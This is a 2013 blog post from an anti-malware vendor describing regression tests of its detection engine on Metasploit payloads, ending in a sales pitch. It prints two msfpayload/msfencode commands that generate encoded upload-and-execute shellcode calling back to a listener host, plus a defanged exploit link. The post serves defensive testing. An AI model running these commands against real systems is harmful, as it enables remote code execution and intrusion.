18 Mar, 2013

Testing Of Malware Detection

Quttera as the leading provider of anti-malware services and solutions, that protect business-critical information in the cloud, hybrid and on-prem, brings the advantages of innovative heuristic, behavioral and AI technologies built-in in our scanning engine.
The Metasploit is one of the best tools out there for penetration testing and generating exploits with payloads. It is an excellent framework to run field tests and quality checks for the anti-malware software capabilities in both manual and automated modes. Here is a nice quick reference guide to the Metasploit covering main features and commands. For our core technology - malicious content detection engine, it is critical that each of the engine modules (especially the heuristic and behavior-based components) work together correctly while investigating and weighing the bits of code. Such sophisticated and self-learning engine requires regular testing on various samples to ensure both performance and regression aspects are covered. In addition to the millions of URLs scanned for malware through our publicly free Online Website Malware Scanner, the engine is continuously undergoing harness and functional tests on arbitrary generated new malware samples of various kinds. This post is just a small glance at specific (legacy) regression test cases picked from the quality assurance process we employ at Quttera labs.
Investigation report for windows/upexec/find_tag shellcode encoded by x86/shikata_ga_nai encoder
Payload generation command:
msfpayload windows/upexec/find_tag LHOST=192.168.111.129 LPORT=9988 PEXEC=./ R| msfencode -e x86/shikata_ga_nai -t raw

Offset of the detected payload:
0

Payload emulation counters:
Detection disassembly:
Part 1
Part 2
Part 3
Investigation report for windows/upexec/reverse_http encoded by x86/jmp_call_additive
Shellcode generation command:
msfpayload windows/upexec/reverse_http PEXEC=./ LHOST=127.0.0.1 LPORT=31337 R | msfencode -e x86/jmp_call_additive -t raw

Offset of the detected payload:
0

Payload emulation counters:
Detection disassembly:
Part 1
Part 2
Investigation report for CoolPlayer+ Portable 2.19.2 exploit
Payload source:
hxxp://1337day.com/exploits/19116

Offset of the detected payload:
0

Payload emulation counters:
Our technology provides in-depth visibility into the code and the intent of the identified suspicious components. It encompasses sophisticated classification and mathematical algorithms to detect cyber threats without a need in signatures to stay up to date with constantly evolving malware. Contact us to schedule a demo or to find out how Quttera technology can help you in protecting your website and any other digital assets. Find out more about our products and services: https://quttera.com/